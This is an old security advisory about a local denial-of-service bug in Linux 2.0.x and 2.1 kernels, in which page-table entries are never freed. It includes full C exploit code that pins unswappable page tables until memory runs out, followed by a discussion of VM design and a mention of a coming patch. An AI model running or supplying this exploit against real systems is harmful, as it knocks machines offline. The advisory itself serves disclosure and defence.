COMMAND
PTE
SYSTEMS AFFECTED
Linux 2.0.x, 2.1.?
PROBLEM
Sed found following. The idea is to take a lot of memory. So, we
map all our virtual pages, to force the system to allow all the
pte (am talking about PC box). So, the process will have
allocated 768 pages that will never be swapped (that's the crucial
point).
So, that's simple, you run program below as much time as you need
to take all the memory, and the PC won't be usable anymore (for
tested 64Mb box, about 20 times were enough). And then, you can
have a wonderful light-show with your HD-led (PC will spend its
time in swapping). Exploit follows:
/* the pte bug - Sed hacking linux kernel, 24 may 1998 */
unsigned long address;
int touch_me;
int fd;
#include <signal.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
void the_handler(int x)
{
signal(SIGSEGV, the_handler);
touch_me++;
if(mmap((void *)address, 4, PROT_READ,
MAP_FIXED|MAP_PRIVATE, fd, 0)==(void *)-1) {
perror("mmap");
exit(1);
}
}
void main(void)
{
/* volatile to fool GCC, we _WANT_ access *address */
volatile unsigned long i;
fd=open("pte.c", O_RDONLY);
if (fd==-1) {
perror("open");
exit(1);
}
signal(SIGSEGV, the_handler);
/* 3*1024*1024*1024 = TASK_SIZE,
* 1024*4096 = number of bytes one pte can map */
for (address=0; address<3*1024*1024*1024; address+=1024*4096) {
i=*(unsigned long *)address;
if (touch_me) {
touch_me=0;
munmap((void *)address, 4);
}
}
while(1)
pause();
}
SOLUTION
We could swap the pgd / pmd / pte, but real question isif it is
possible or you want something like lazy page table allocation.
The Linux VM code has a "flat" model, whereas Mach VM (the basis
of the VM system used by 4.4BSD and its derivatives) and UVM
(NetBSD's new VM system) have a 2-layer model; the upper layer
holds mappings that can coalesce to save space, and the lower
layer holds the (redundant) physical mappings (in the format used
by the MMU/software TLB reload engine/whatever). This lower layer
is able to allocate page tables or other physical mapping
resources "lazily", as mappings for actual physical pages are
entered by the upper layer. This lower layer is also free to
"forget" mappings at any time, so when memory is in extremely
short supply, the page tables can simply be freed to the system
(and that process's page table base pointer set to some default
empty page table), and when that process runs again, the mappings
are simply rebuilt as the page faults occur from the (compact)
info stored in the upper layer.
The setrlimit will not work to prevent this. You can only limit
the number of processes a person can launch, to limit the havoc
they can cause. The bug stems from the way Linux manages PGD,
PMD, and PTE structures. At this time, Linux only deallocates
PTEs when it frees page ranges. PMD and PGD structures are not
checked for use when entries are freed from them.
Perry Harrington is working on a patch against 2.1 series kernels,
which will be backported to the 2.0 series.